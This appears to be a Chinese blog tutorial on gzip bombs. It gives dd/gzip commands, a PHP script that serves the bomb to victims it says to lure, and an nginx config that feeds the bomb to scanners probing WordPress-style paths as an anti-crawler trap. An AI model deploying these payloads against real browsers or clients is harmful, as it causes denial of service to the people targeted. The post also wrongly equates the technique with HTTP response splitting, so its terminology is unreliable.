Gzip轰炸详解与实践

最新推荐文章于 2024-03-13 14:41:50 发布

小恒的java小抄

最新推荐文章于 2024-03-13 14:41:50 发布

阅读量1.5k

点赞数 28

文章标签： nginx web安全网络爬虫 python

本文链接：https://blog.csdn.net/2302_81578551/article/details/136607859

版权

大家好，我是恒，这是我在CSDN的第一篇文章。

介绍一下gzip炸弹

Gzip炸弹”或“HTTP响应拆分攻击”，它利用了HTTP协议中的GZIP压缩机制以及服务器和客户端处理大容量解压缩资源时可能存在的性能问题。这种攻击的目标是通过构造一个高度压缩的内容来耗尽客户端（通常是Web浏览器）的计算资源，导致其变得极其缓慢，甚至崩溃。

大致实现思路

Gzip炸弹的基本实现步骤可以概括为以下几个核心部分：

生成大量可高度压缩的数据：
创造一个原始文件，通常包含大量重复内容或易于压缩的数据，比如使用 /dev/zero 或其他可生成大量重复字节流的方式填充一个大文件。例如
```
dd if=/dev/zero of=bomb.raw bs=1M count=1000 # 创建1GB的纯零文件
```
对原始数据进行高度压缩：
使用gzip或其他支持压缩的工具对上述文件进行压缩，使其体积大大减小但解压缩时占用资源巨大。
```
gzip bomb.raw -c > bomb.gz # 直接将压缩后的数据输出到bomb.gz文件
```

配置服务器发送Gzip压缩内容：

在Web服务器上设置动态内容，如PHP、Node.js或其他服务器端语言，确保当用户访问特定URL时，服务器会发送压缩过的数据，并且设置正确的HTTP头：

<?php
// 设置HTTP响应头
header("Content-Encoding: gzip");
header("Content-Length: " . filesize('bomb.gz')); // 提供压缩文件大小
// 清除输出缓冲区，确保直接发送文件内容
if (ob_get_level()) ob_end_clean();
// 发送压缩文件
readfile('bomb.gz');

诱导受害者访问链接：
分享或诱使目标访问包含Gzip炸弹的URL，如 http://example.com/bomb.php。

一旦受害者访问该链接，他们的浏览器将会接收到高度压缩的数据，并尝试解压缩。由于数据在设计上具有极高压缩比，解压过程可能会消耗极大的内存和CPU资源，最终可能导致浏览器冻结、崩溃，或者至少造成严重的性能问题。

注意：实际操作中构建和传播Gzip炸弹是非法行为，应当仅用于安全研究和防御测试的目的。合法的网站和服务应当采取适当的防护措施来防止此类攻击，如限制HTTP响应的大小、过滤或阻止异常请求等。

实际生产环境尝试（反爬机制）

生成大量可高度压缩的数据：

创造一个原始文件，通常包含大量重复内容或易于压缩的数据，比如使用 /dev/zero 或其他可生成大量重复字节流的方式填充一个大文件。例如

dd if=/dev/zero bs=1M count=1024 | gzip > bomb.gzip

dd if=/dev/zero	从 `/dev/zero` 设备读取数据。`/dev/zero` 是一个特殊的设备文件，当你从它读取数据时，它会持续不断地提供全零字节流。
bs=1M	设置每次读取数据的块大小为1MiB（即1兆字节）。
count=1024	指定读取1024个1MiB的数据块，因此总共生成的数据量为1024 MiB，即约为1 GiB（1024 MiB = 1 GiB）。
\| gzip	将`dd`命令产生的全零字节流通过管道传递给`gzip`命令进行压缩。
> bomb.gzip	将压缩后的数据输出并保存到名为`bomb.gzip`的文件中。

执行这个命令后，会在当前工作目录下生成一个名为 bomb.gzip 的压缩文件。bomb.gzip 是由原始数据（这里是从 /dev/zero 读取的1024个1MiB的全零数据块）经过 gzip 压缩工具处理后得到的结果文件。

在Nginx中设置“GZIP炸弹”：在Nginx中设置“GZIP炸弹”并不是推荐的安全措施，因为这不仅可能带来潜在的法律风险，还可能影响到正常的服务和用户体验。但是，假设出于某种教育目的理解这一概念，下面是一种模拟设置方法（请不要在生产环境中实际部署此类策略）：
```
server {
    listen 80;
    server_name boom.yunduanjianzhan.cn;

    # 匹配指定的恶意路径并重定向至gzip炸弹
    location ~ /(wlwmanifest|sitemap|xmlrpc|config\.php|wp-login|sign_in|execute-solution|wp-admin|eval-stdin\.php) {
        rewrite ^ /bomb.gzip last;
    }

    # 返回gzip炸弹
    location = /bomb.gzip {
        internal;
        alias /path/to/bomb.gzip; # 替换为实际存储gzip炸弹文件的绝对路径
        access_log off;
        add_header Content-Type 'application/octet-stream';
        add_header Content-Encoding gzip;
        default_type application/octet-stream;
        gunzip off; # 关闭nginx自动解压
    }
}
```
在Nginx配置中，“匹配指定的恶意路径”指的是通过正则表达式匹配那些常被恶意脚本小子扫描或试图利用的敏感URL路径。这些路径通常与一些常见漏洞或默认安装文件有关，例如WordPress、ThinkPHP等框架或CMS系统的后台登录接口、安装脚本、可能执行恶意代码的入口点等。

在这个例子中，location ~ (wlwmanifest|sitemap|xmlrpc|config\.php|wp-login|sign_in|execute-solution|wp-admin|eval-stdin\.php) 这一行就是用来匹配这些可能的恶意请求路径：当请求的URL路径匹配到上述正则表达式时，Nginx将按照配置的规则进行处理，此处是通过rewrite指令将请求重定向至预设的GZIP炸弹文件。
检查访问时进程占用空间